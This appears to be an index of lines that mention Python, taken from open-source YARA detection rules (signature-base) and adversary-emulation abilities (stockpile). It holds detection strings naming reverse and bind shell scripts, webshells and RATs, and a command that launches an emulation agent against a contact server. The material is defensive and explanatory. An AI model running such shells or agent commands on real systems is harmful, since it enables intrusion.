signature-base gen_fireeye_redteam_tools.yar description = “Detects FireEye’s Python Redflar” CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar description = “Detects FireEye’s Python MATRYOSHKA tool” CC BY-NC 4.0
signature-base gen_malware_MacOS_plist_suspicious.yar $p1 = “python” ascii CC BY-NC 4.0
signature-base gen_osx_evilosx.yar //strings present in decoded python script: CC BY-NC 4.0
signature-base gen_osx_pyagent_persistence.yar description = “Detects a Python agent that establishes persistence on macOS” CC BY-NC 4.0
signature-base gen_osx_pyagent_persistence.yar $h1 = “#!/usr/bin/env python” CC BY-NC 4.0
signature-base gen_python_encoded_adware.yar description = “Encoded Python payload for adware” CC BY-NC 4.0
signature-base gen_python_pty_shell.yar reference = “https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py” CC BY-NC 4.0
signature-base gen_python_pyminifier_encoded_payload.yar description = “Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET” CC BY-NC 4.0
signature-base gen_python_reverse_shell.yara description = “Python Base64 encoded reverse shell” CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar description = “Detects Python RAT” CC BY-NC 4.0
signature-base gen_redsails.yar description = “Detects Red Sails Hacktool - Python” CC BY-NC 4.0
signature-base gen_susp_wer_files.yar $l3 = “AppPath=C:\Python” wide nocase CC BY-NC 4.0
signature-base gen_webshells.yar $pbs30 = “bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww” wide ascii CC BY-NC 4.0
signature-base thor-hacktools.yar description = “Detects malicious python shell” CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = “#Use: python wh_bindshell.py [port] [password]” CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “python -c"import md5;x=md5.new(‘you_password’);print x.hexdigest()"” fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = “# d00r.py 0.3a (reverse|bind)-shell in python by fQ” fullword CC BY-NC 4.0
signature-base thor-webshells.yar description = “Semi-Auto-generated - file cgi-python.py.txt” CC BY-NC 4.0
stockpile 0ab383be-b819-41bf-91b9-1bd4404d83bf.yml description: A Python agent which communicates via the HTML contact Apache-2.0
stockpile 0ab383be-b819-41bf-91b9-1bd4404d83bf.yml python ragdoll.py -W $server#{app.contact.html} Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml name: Check Python Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml description: Check to see what version of python is installed Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml python3 --version;python2 --version;python --version Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml python3 --version&python2 --version&python --version Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.